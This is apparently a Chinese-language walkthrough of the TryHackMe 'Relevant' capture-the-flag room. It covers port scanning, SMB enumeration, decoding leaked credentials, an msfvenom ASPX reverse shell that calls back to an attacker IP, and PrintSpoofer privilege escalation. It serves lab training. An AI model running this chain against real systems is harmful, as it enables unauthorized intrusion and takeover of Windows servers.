【THM】Relevant-练习
针对实验靶机完成渗透测试挑战。
本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/relevant
通过学习相关知识点:针对实验靶机完成渗透测试挑战。
实验简介
你已被分配给一个客户,该客户希望在一个环境中进行渗透测试,该环境将在 7 天内发布到生产环境中。
工作范围:
客户要求渗透测试工程师对目标虚拟环境进行评估,要求工程师提交有关评估的最少信息,客户希望渗透测试人员从恶意行为者的角度进行渗透测试(黑盒渗透测试),另外还要求渗透测试人员提交以下两个标志(未提供具体位置)以作为渗透成果的证明:
- user.txt
- root.txt
此外,客户提供了以下补充说明(请自行尝试):
- 本次活动允许使用任何工具或技术,但要求测试者先尝试手动利用。
- 找到并记录所有发现的漏洞。
- 将发现的标志提交到仪表板(dashboard)。
- 只有分配给你的机器的 IP 地址在渗透测试的资产范围内。
- 查找并报告所有漏洞(获得root权限的方式不止一个)
答题
启动本地机器(使用KAIL作为本地攻击机),连接TryHackMe平台所提供的openvpn,在实验房间页面点击“Start Machine”以获取目标靶机的IP。
user flag
先对目标靶机进行nmap端口扫描。
nmap -p- 10.10.117.216
进一步扫描端口
nmap -p 80,135,139,445,3389,49663,49667,49669 10.10.117.216 -sV -sC
由上图可知靶机的80、49663端口都开启了HTTP服务器(IIS),尝试对80端口进行目录扫描--无结果,尝试对49663端口进行目录扫描--结果如下。
gobuster dir -u http://10.10.117.216:49663 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s '200,301' --status-codes-blacklist '' --no-error -t 50
#排除错误结果:--no-error
#线程数设置为50:-t 50
#只显示状态为200和301的目录:-s '200,301'
#将黑名单状态码设置为空(默认的黑名单状态码为404):--status-codes-blacklist ''
#gobuster有时会提示不能同时设置白名单状态码和黑名单状态码,所以此处选择修改默认的黑名单状态码(404)并将其设置为空。
由gobuster结果可知:我们可以在浏览器中通过url路径http://10.10.117.216:49663/nt4wrksv/访问到靶机的SMB共享列表中的nt4wrksv目录
目标靶机开启了SMB服务,我们尝试枚举目标机的SMB共享。
smbclient -L \\10.10.117.216 #默认无密码 直接按回车键尝试
#或者输入 smbclient -L \\\\ $IP\\
#或者输入 enum4linux -S $IP //IP为靶机IP
从SMB共享列表中看到一个用户,名称为nt4wrksv,尝试使用该账户进行SMB登录并从该SMB共享中下载敏感文件到本地机,然后对文件内容进行查看。
smbclient //10.10.117.216/nt4wrksv #默认无密码,询问登录密码时--直接按回车键
#或者 smbclient -L //10.10.183.234 -U nt4wrksv
#或者输入 smbclient -L \\\\ $IP\\$username
得到两个base64编码记录,进行base64解码以获取相关信息(echo "xxxxx" | base64 -d)。
echo "Qm9iIC0gIVBAJCRXMHJEITEyMw==" | base64 -d
echo "QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk" | base64 -d
Bob - !P@$$W0rD!123
Bill - Juw4nnaM4n420696969!$$$
构造msfvenom命令以便生成一个反向shell文件,然后再重新登录刚才所访问的SMB共享,通过SMB服务上传反向shell文件(put shell.aspx)到目标靶机。
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.13.16.58 LPORT=1234 -f aspx -o shell.aspx
设置Netcat反向shell监听器。
nc -lvnp 1234
在通过SMB服务上传文件成功并完成监听器设置后,使用curl命令访问刚才已上传的反向shell文件(路径为:$IP:49663/nt4wrksv/shell.aspx),获得目标shell(输入whoami命令验证)并查看user flag内容。
curl http://10.10.117.216:49663/nt4wrksv/shell.aspx #在本地浏览器的url中直接访问地址也可
#Windows命令行-- 按文件名查找相关路径 dir /s /b c:\ | find "user.txt"
#使用/b带有 DIR 命令的开关会去除所有多余的信息,仅显示当前目录中的文件夹和文件的名称,而不显示文件大小和时间戳等属性。
#或者直接输入 dir \user.txt /s
user flag内容为:THM
root flag
在已获得的shell界面输入whoami /priv命令 查看当前用户在目标系统中的相关权限。
由上图可知 当前用户似乎启用了 SeImpersonatePrivilege 令牌权限,这意味着我们可以使用令牌模拟来提升权限;接下来我们需要在目标机上执行一个漏洞利用程序--下载PrintSpoofer.exe,并将该exe文件上传到目标机(可以通过SMB服务上传文件)。
执行漏洞exp,提供-i参数以在当前命令提示符下与新进程交互,并提供-c参数以指定在程序执行时运行 CMD。
dir /s /b c:\ | find "PrintSpoofer64.exe"
cd c:\inetpub\wwwroot\nt4wrksv\
PrintSpoofer64.exe -i -c cmd
提权之后获得目标的root shell,通过此shell界面可以查看root flag内容。
cd /users/administrator
THM
